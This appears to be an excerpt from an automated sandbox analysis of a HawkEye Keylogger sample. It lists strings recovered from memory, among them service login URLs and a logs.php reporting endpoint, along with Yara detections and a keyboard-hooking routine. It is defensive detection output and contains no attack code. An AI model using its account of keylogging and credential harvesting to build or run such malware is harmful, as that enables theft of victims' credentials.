                  Source: tDb0ggawON.exe, 00000000.00000003.267830462.0000000008844000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.268287341.0000000008859000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.268733117.0000000008855000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.268545826.0000000008854000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.268234994.000000000884A000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.268486124.000000000884A000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.269086352.0000000008855000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/W
                  Source: tDb0ggawON.exe, 00000000.00000003.269086352.0000000008855000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
                  Source: tDb0ggawON.exe, 00000000.00000003.268287341.0000000008859000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.268733117.0000000008855000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.268545826.0000000008854000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.268234994.000000000884A000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.268486124.000000000884A000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.269086352.0000000008855000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/H
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://www.msn.com
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://www.msn.com/
                  Source: vbc.exe, 0000000E.00000003.346615924.0000000002A3E000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000E.00000003.346764258.0000000002A3E000.00000004.00000800.00020000.00000000.sdmp, bhvED7C.tmp.14.drString found in binary or memory: http://www.msn.com/?ocid=iehp
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/consent/55a804
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/scripttemplate
                  Source: vbc.exe, 0000000F.00000000.337259386.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
                  Source: tDb0ggawON.exe, 00000000.00000002.310251418.0000000009A52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                  Source: tDb0ggawON.exe, 00000000.00000002.310251418.0000000009A52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                  Source: tDb0ggawON.exe, 00000000.00000002.310251418.0000000009A52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                  Source: tDb0ggawON.exe, 0000000B.00000002.517829370.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.site.com/logs.php
                  Source: tDb0ggawON.exe, 00000000.00000002.310251418.0000000009A52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                  Source: tDb0ggawON.exe, 00000000.00000002.310251418.0000000009A52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                  Source: tDb0ggawON.exe, 00000000.00000002.310251418.0000000009A52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                  Source: tDb0ggawON.exe, 00000000.00000002.310251418.0000000009A52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4842492154761;g
                  Source: vbc.exe, 0000000E.00000003.346615924.0000000002A3E000.00000004.00000800.00020000.00000000.sdmp, bhvED7C.tmp.14.drString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=58648497779
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=3931852
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5864849777998;gt
                  Source: vbc.exe, 0000000E.00000003.346615924.0000000002A3E000.00000004.00000800.00020000.00000000.sdmp, bhvED7C.tmp.14.drString found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5864849777998;gtm=
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://amp.azure.net/libs/amp/1.8.0/azuremediaplayer.min.js
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://arc.msn.com/v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=314559&adm=
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC54c8a2b02c3446f48a60b41e8a5ff47
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC5bdddb231cf54f958a5b6e76e9d8eee
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC828bc1cde9f04b788c98b5423157734
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC9b2d2bc73c8a4a1d8dd5c3d69b6634a
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc13122162a9a46c3b4cbf05ffccde0f
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc71c68d7b8f049b6a6f3b669bd5d00c
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCee0d4d5fd4424c8390d703b105f82c3
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCfd484f9188564713bbc5d13d862ebbf
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://assets.adobedtm.com/launch-EN7b3d710ac67a4a1195648458258f97dd.min.js
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://az416426.vo.msecnd.net/scripts/a/ai.0.js
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://az725175.vo.msecnd.net/scripts/jsll-4.js
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://contextual.media.net/
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://contextual.media.net/48/nrrV18753.js
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://contextual.media.net/803288796/fcmain.js?&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://contextual.media.net/__media__/js/util/nrrV9140.js
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
                  Source: vbc.exe, 0000000E.00000003.346637721.0000000002A49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
                  Source: vbc.exe, 0000000E.00000003.346637721.0000000002A49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://c
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://cvision.media.net/new/286x175/2/57/35/144/83ebc513-f6d1-4e0e-a39a-bef975147e85.jpg?v=9
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://cvision.media.net/new/286x175/2/75/95/36/612b163a-ff7b-498a-bad2-3c52bbd2c504.jpg?v=9
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://cvision.media.net/new/286x175/2/89/162/29/8ee7a9a3-dec9-4d15-94e1-5c73b17d2de1.jpg?v=9
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://cvision.media.net/new/286x175/3/248/152/169/520bb037-5f8d-42d6-934b-d6ec4a6832e8.jpg?v=9
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://cvision.media.net/new/300x194/2/138/47/25/3b2da2d4-7a38-47c3-b162-f33e769f51f5.jpg?v=9
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://cvision.media.net/new/300x300/3/167/174/27/39ab3103-8560-4a55-bfc4-401f897cf6f2.jpg?v=9
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BE6B7572D
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://fonts.googleapis.com/css?family=Google
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://fonts.gstatic.com/s/googlesans/v16/4UaGrENHsxJlGDuGo1OIlI3K.woff
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://fonts.gstatic.com/s/googlesans/v16/4UabrENHsxJlGDuGo1OIlLU94bt3.woff
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v20/KFOlCnqEu92Fr1MmEU9vAA.woff
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v20/KFOmCnqEu92Fr1Me5g.woff
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_333%2Cw_311%2Cc_fill%2Cg_faces:aut
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DnuZ
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Dnv6
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Dnwt
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DsDH
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmQ
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmV
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmZ
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FGwC
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4n1yl
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4n4cm
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJ7
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJa
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4nqTh
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4sQww?ver=37ff
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tD2S
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tG3O
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tIoW
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tIoY
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tKUA
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tMOD
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tMOM
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tQVa
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4u1kF
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ubMD
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wqj5
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4zuiC
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RWeTGO?ver=8c74&q=90&m=
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
                  Source: vbc.exe, 0000000E.00000003.346615924.0000000002A3E000.00000004.00000800.00020000.00000000.sdmp, bhvED7C.tmp.14.drString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1601451842&rver=6.0.5286.0&wp=MBI_SSL&wre
                  Source: vbc.exe, 0000000E.00000003.349517440.0000000000C3E000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 0000000E.00000002.349986576.0000000000C3E000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 0000000E.00000003.349382801.0000000000C3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srfhttps://www.google.com/chrome/https://www.google.com/chrome/thank-yo
                  Source: vbc.exe, 0000000E.00000003.346615924.0000000002A3E000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000E.00000003.346637721.0000000002A49000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000E.00000003.349371680.0000000000C3B000.00000004.00000020.00020000.00000000.sdmp, bhvED7C.tmp.14.drString found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e
                  Source: vbc.exeString found in binary or memory: https://login.yahoo.com/config/login
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://logincdn.msauth.net/16.000.28230.00/MeControl.js
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meBoot.min.js
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meCore.min.js
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://mem.gfx.ms/meversion?partner=RetailStore2&market=en-us&uhf=1
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://mwf-service.akamaized.net/mwf/css/bundle/1.57.0/west-european/default/mwf-main.min.css
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://mwf-service.akamaized.net/mwf/js/bundle/1.57.0/mwf-auto-init-main.var.min.js
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://optanon.blob.core.windows.net/skins/4.1.0/default_flat_top_two_button_black/v2/css/optanon.c
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://optanon.blob.core.windows.net/skins/4.1.0/default_flat_top_two_button_black/v2/images/cookie
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://pki.goog/repository/0
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://play.google.com/intl/en_us/badges/images/generic/de_badge_web_generic.png
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://prod-video-cms-rt-microsoft-com.akamaized.net/vhs/api/videos/RE4sQBc
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://srtb.msn.com/auction?a=de-ch&b=623d43496a394c99b1336ff5cc139eb9&c=MSN&d=http%3A%2F%2Fwww.msn
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://statics-marketingsites-neu-ms-com.akamaized.net/statics/override.css?c=7
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://www.digicert.com/CPS0
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://www.globalsign.com/repository/0
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://www.google-analytics.com/analytics.js
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://www.google-analytics.com/gtm/js?id=GTM-N7S69J3&cid=299872286.1601476511
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://www.google.com/
                  Source: vbc.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://www.google.com/chrome/
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://www.google.com/chrome/application/x-msdownloadC:
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://www.google.com/chrome/static/css/main.v2.min.css
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://www.google.com/chrome/static/css/main.v3.min.css
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://www.google.com/chrome/static/images/app-store-download.png
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://www.google.com/chrome/static/images/chrome-logo.svg
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://www.google.com/chrome/static/images/chrome_safari-behavior.jpg
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://www.google.com/chrome/static/images/chrome_throbber_fast.gif
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://www.google.com/chrome/static/images/cursor-replay.cur
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://www.google.com/chrome/static/images/download-browser/big_pixel_phone.png
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://www.google.com/chrome/static/images/download-browser/pixel_phone.png
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://www.google.com/chrome/static/images/download-browser/pixel_tablet.png
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/google-chrome-logo.jpg
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/google-logo-one-color.jpg
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-description-white-blue-bg.jpg
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-fb.jpg
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-file-download.jpg
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-help.jpg
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-twitter.jpg
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-youtube.jpg
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://www.google.com/chrome/static/images/folder-applications.svg
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://www.google.com/chrome/static/images/google-play-download.png
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-beta.png
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-canary.png
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-dev.png
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-enterprise.png
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-bottom-left.png
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-middle.png
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-top-right.png
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_features.png
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_privacy.png
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_tools.png
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/laptop_desktop.png
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://www.google.com/chrome/static/images/icon-announcement.svg
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://www.google.com/chrome/static/images/icon-file-download.svg
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://www.google.com/chrome/static/images/mac-ico.png
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://www.google.com/chrome/static/images/thank-you/thankyou-animation.json
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://www.google.com/chrome/static/js/installer.min.js
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://www.google.com/chrome/static/js/main.v2.min.js
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://www.googleadservices.com/pagead/conversion.js
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://www.googleadservices.com/pagead/conversion_async.js
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://www.googleadservices.com/pagead/p3p.xml
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-26908291-4
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=GTM-PZ6TRJB
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://www.gstatic.com/external_hosted/autotrack/autotrack.js
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://www.gstatic.com/external_hosted/lottie/lottie.js
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://www.gstatic.com/external_hosted/modernizr/modernizr.js
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://www.gstatic.com/external_hosted/scrollmagic/ScrollMagic.min.js
                  Source: bhvED7C.tmp.14.drString found in binary or memory: https://www.gstatic.com/external_hosted/scrollmagic/animation.gsap.min.js
                  Source: unknownDNS traffic detected: queries for: 168.98.4.0.in-addr.arpa

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Yara detected HawkEye Keylogger
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.45fa72.13.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.408208.24.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.400000.21.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.408208.17.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.45fa72.19.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.tDb0ggawON.exe.630ecaa.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.45fa72.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.409c0d.22.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.400000.11.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.tDb0ggawON.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.400000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.tDb0ggawON.exe.62b7440.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.409c0d.18.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.tDb0ggawON.exe.45fa72.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.tDb0ggawON.exe.408208.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.45fa72.23.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.408208.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.tDb0ggawON.exe.409c0d.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.400000.16.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.409c0d.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.400000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.409c0d.14.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.408208.12.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.tDb0ggawON.exe.50cb610.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.tDb0ggawON.exe.62b8e45.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.tDb0ggawON.exe.51cc830.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.tDb0ggawON.exe.302b2a8.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000B.00000000.296875600.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000000.298995569.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.516368822.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000000.298155890.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000000.297537951.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.308274343.00000000062B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.517829370.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.303672569.0000000004CE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: tDb0ggawON.exe PID: 5752, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: tDb0ggawON.exe PID: 3536, type: MEMORYSTR
                  Contains functionality to log keystrokes (.Net Source)
                  Source: 11.0.tDb0ggawON.exe.400000.21.unpack, Form1.cs.Net Code: HookKeyboard
                  Source: 11.0.tDb0ggawON.exe.400000.11.unpack, Form1.cs.Net Code: HookKeyboard
